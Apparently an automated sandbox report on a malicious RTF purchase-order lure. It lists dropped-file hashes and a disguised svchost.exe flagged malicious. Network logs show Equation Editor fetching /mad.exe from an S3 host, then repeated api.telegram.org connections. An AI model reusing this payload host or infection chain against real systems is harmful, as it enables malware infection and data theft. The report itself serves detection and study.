SHA-512:	6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious:	false
Preview:	SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$5421-allignright.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe Download File
Process:	C:\Users\user\AppData\Roaming\CTF loader_es.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	2.545995908897728
Encrypted:	false
SSDEEP:	6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
MD5:	D96F52FC8733D2F4A127BDC44D4CEB25
SHA1:	E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
SHA-256:	FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
SHA-512:	08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................".(.....^..}.....(.......(.....&.(......".......".(#....Vs....($...t.............0................s......o......0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.004155264160704
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PO5421-allignright.doc
File size:	1259855
MD5:	901e61918c3c108ebe8d6eabd18d0cc4
SHA1:	bbc834bb8d6a92e7070276884ccde86c0e2f6f38
SHA256:	8e7e22725654ca02a0c9d079fa96ac9b53f131cf029076b90934b50a23a36ccb
SHA512:	0594468f53038fa13f32b6abe45b1d7af1824d6744f6170d354c92971668b094afa2737b6f691306fb56748836054b974369b1848c44911f56ee46ccc68d3a37
SSDEEP:	24576:/8KByfuwF1U89tdfwCUXDPEqaRHsFJA7kEqw35hudSykT5IxCj0vUtThWkEDR4I:h
File Content Preview:	{\rtf907{\object225965 225965 \'' \objlink48361883\:\objupdate9697351796973517\objw2899\objh6130{\*\objdata429905 {\bin0000000000

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000121h								no
1	000000D9h	2	embedded	eQUATIOn.3	629560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/21-20:19:21.939651	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	61200	8.8.8.8	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 20:17:52.942353010 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.141972065 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.142076969 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.142571926 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.344681025 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366573095 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366596937 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366610050 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366621971 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366636038 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366673946 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366693974 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366723061 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366749048 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366748095 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.366765976 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.366766930 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.366806030 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.370558977 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.390291929 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.390454054 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569222927 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569257021 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569291115 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569314003 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569333076 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569356918 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569397926 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569422007 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569432974 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569443941 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569467068 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569470882 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569475889 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569489956 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569490910 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569505930 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569530010 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569576025 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569601059 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569622993 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569624901 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569636106 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569648027 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569667101 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569669962 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569681883 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569693089 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569705009 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569715977 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.569727898 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.569752932 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.570519924 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.592771053 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.592819929 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.592847109 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.592938900 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.593259096 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773540020 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773596048 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773626089 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773627043 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773647070 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773658991 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773673058 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773679972 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773694038 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773701906 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773718119 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773722887 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773734093 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773744106 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773753881 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773768902 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773781061 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773792982 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773801088 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773819923 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773830891 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773845911 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773854017 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773869038 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773880959 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773894072 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773905039 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773919106 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773927927 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773941994 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773951054 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773967981 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.773977995 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.773993015 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.774003029 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.774024010 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.774034023 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.774049997 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.774060011 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.774072886 CEST	80	49165	52.218.170.106	192.168.2.22
May 4, 2021 20:17:53.774082899 CEST	49165	80	192.168.2.22	52.218.170.106
May 4, 2021 20:17:53.774097919 CEST	80	49165	52.218.170.106	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 20:17:52.801079035 CEST	52197	53	192.168.2.22	8.8.8.8
May 4, 2021 20:17:52.862817049 CEST	53	52197	8.8.8.8	192.168.2.22
May 4, 2021 20:17:52.863138914 CEST	52197	53	192.168.2.22	8.8.8.8
May 4, 2021 20:17:52.920315027 CEST	53	52197	8.8.8.8	192.168.2.22
May 4, 2021 20:19:03.205547094 CEST	53099	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:03.254734993 CEST	53	53099	8.8.8.8	192.168.2.22
May 4, 2021 20:19:11.175820112 CEST	52838	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:11.229240894 CEST	53	52838	8.8.8.8	192.168.2.22
May 4, 2021 20:19:21.890827894 CEST	61200	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:21.939651012 CEST	53	61200	8.8.8.8	192.168.2.22
May 4, 2021 20:19:21.940257072 CEST	61200	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:21.988868952 CEST	53	61200	8.8.8.8	192.168.2.22
May 4, 2021 20:19:27.992191076 CEST	49548	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:28.044361115 CEST	53	49548	8.8.8.8	192.168.2.22
May 4, 2021 20:19:28.044992924 CEST	49548	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:28.096504927 CEST	53	49548	8.8.8.8	192.168.2.22
May 4, 2021 20:19:34.110997915 CEST	55627	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:34.162189007 CEST	53	55627	8.8.8.8	192.168.2.22
May 4, 2021 20:19:40.673680067 CEST	56009	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:40.723469019 CEST	53	56009	8.8.8.8	192.168.2.22
May 4, 2021 20:19:46.722088099 CEST	61865	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:46.770564079 CEST	53	61865	8.8.8.8	192.168.2.22
May 4, 2021 20:19:53.082840919 CEST	55171	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:53.135138988 CEST	53	55171	8.8.8.8	192.168.2.22
May 4, 2021 20:19:59.732846975 CEST	52496	53	192.168.2.22	8.8.8.8
May 4, 2021 20:19:59.783612013 CEST	53	52496	8.8.8.8	192.168.2.22
May 4, 2021 20:20:00.753819942 CEST	57564	53	192.168.2.22	8.8.8.8
May 4, 2021 20:20:00.806736946 CEST	53	57564	8.8.8.8	192.168.2.22
May 4, 2021 20:20:00.883591890 CEST	57564	53	192.168.2.22	8.8.8.8
May 4, 2021 20:20:00.935100079 CEST	53	57564	8.8.8.8	192.168.2.22
May 4, 2021 20:20:01.179163933 CEST	63009	53	192.168.2.22	8.8.8.8
May 4, 2021 20:20:01.230938911 CEST	53	63009	8.8.8.8	192.168.2.22
May 4, 2021 20:20:05.672621965 CEST	59319	53	192.168.2.22	8.8.8.8
May 4, 2021 20:20:05.724196911 CEST	53	59319	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 20:17:52.801079035 CEST	192.168.2.22	8.8.8.8	0xad13	Standard query (0)	miolouno.s3-us-west-2.amazonaws.com	A (IP address)	IN (0x0001)
May 4, 2021 20:17:52.863138914 CEST	192.168.2.22	8.8.8.8	0xad13	Standard query (0)	miolouno.s3-us-west-2.amazonaws.com	A (IP address)	IN (0x0001)
May 4, 2021 20:19:03.205547094 CEST	192.168.2.22	8.8.8.8	0x431d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:11.175820112 CEST	192.168.2.22	8.8.8.8	0x3f79	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:21.890827894 CEST	192.168.2.22	8.8.8.8	0xbccb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:21.940257072 CEST	192.168.2.22	8.8.8.8	0xbccb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:27.992191076 CEST	192.168.2.22	8.8.8.8	0x729a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:28.044992924 CEST	192.168.2.22	8.8.8.8	0x729a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:34.110997915 CEST	192.168.2.22	8.8.8.8	0x9e23	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:40.673680067 CEST	192.168.2.22	8.8.8.8	0xb41b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:46.722088099 CEST	192.168.2.22	8.8.8.8	0xfb8	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:53.082840919 CEST	192.168.2.22	8.8.8.8	0x4fd2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:19:59.732846975 CEST	192.168.2.22	8.8.8.8	0x977b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:20:00.753819942 CEST	192.168.2.22	8.8.8.8	0xf20f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:20:00.883591890 CEST	192.168.2.22	8.8.8.8	0xf20f	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:20:01.179163933 CEST	192.168.2.22	8.8.8.8	0x2dd9	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)
May 4, 2021 20:20:05.672621965 CEST	192.168.2.22	8.8.8.8	0xcc4d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 20:17:52.862817049 CEST	8.8.8.8	192.168.2.22	0xad13	No error (0)	miolouno.s3-us-west-2.amazonaws.com	s3-us-west-2-r-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 20:17:52.862817049 CEST	8.8.8.8	192.168.2.22	0xad13	No error (0)	s3-us-west-2-r-w.amazonaws.com		52.218.170.106	A (IP address)	IN (0x0001)
May 4, 2021 20:17:52.920315027 CEST	8.8.8.8	192.168.2.22	0xad13	No error (0)	miolouno.s3-us-west-2.amazonaws.com	s3-us-west-2-r-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 20:17:52.920315027 CEST	8.8.8.8	192.168.2.22	0xad13	No error (0)	s3-us-west-2-r-w.amazonaws.com		52.218.170.106	A (IP address)	IN (0x0001)
May 4, 2021 20:19:03.254734993 CEST	8.8.8.8	192.168.2.22	0x431d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:11.229240894 CEST	8.8.8.8	192.168.2.22	0x3f79	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:21.939651012 CEST	8.8.8.8	192.168.2.22	0xbccb	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:21.988868952 CEST	8.8.8.8	192.168.2.22	0xbccb	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:28.044361115 CEST	8.8.8.8	192.168.2.22	0x729a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:28.096504927 CEST	8.8.8.8	192.168.2.22	0x729a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:34.162189007 CEST	8.8.8.8	192.168.2.22	0x9e23	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:40.723469019 CEST	8.8.8.8	192.168.2.22	0xb41b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:46.770564079 CEST	8.8.8.8	192.168.2.22	0xfb8	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:53.135138988 CEST	8.8.8.8	192.168.2.22	0x4fd2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:19:59.783612013 CEST	8.8.8.8	192.168.2.22	0x977b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:20:00.806736946 CEST	8.8.8.8	192.168.2.22	0xf20f	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:20:00.935100079 CEST	8.8.8.8	192.168.2.22	0xf20f	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:20:01.230938911 CEST	8.8.8.8	192.168.2.22	0x2dd9	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)
May 4, 2021 20:20:05.724196911 CEST	8.8.8.8	192.168.2.22	0xcc4d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

miolouno.s3-us-west-2.amazonaws.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	52.218.170.106	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 20:17:53.142571926 CEST	1	OUT	GET /mad.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: miolouno.s3-us-west-2.amazonaws.com Connection: Keep-Alive
May 4, 2021 20:17:53.366573095 CEST	1	IN	HTTP/1.1 200 OK x-amz-id-2: nQWR7PdhKyTF62auB5La//IeIyzvm7qHcM8GrjzrhHEXGQjv8sR40SNtIrZWdDG7Wd7/nV/RCxM= x-amz-request-id: E5XGS7Q9N2YWQSDG Date: Tue, 04 May 2021 18:17:54 GMT Last-Modified: Tue, 04 May 2021 10:51:11 GMT ETag: "d96f52fc8733d2f4a127bdc44d4ceb25" x-amz-version-id: IAoppdQmXchpR2n3EPNrNxP0ggf842rd Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 3367424 Server: AmazonS3

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 20:19:03.431649923 CEST	149.154.167.220	443	192.168.2.22	49166	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:11.386008978 CEST	149.154.167.220	443	192.168.2.22	49167	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 20:19:22.101192951 CEST	149.154.167.220	443	192.168.2.22	49168	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
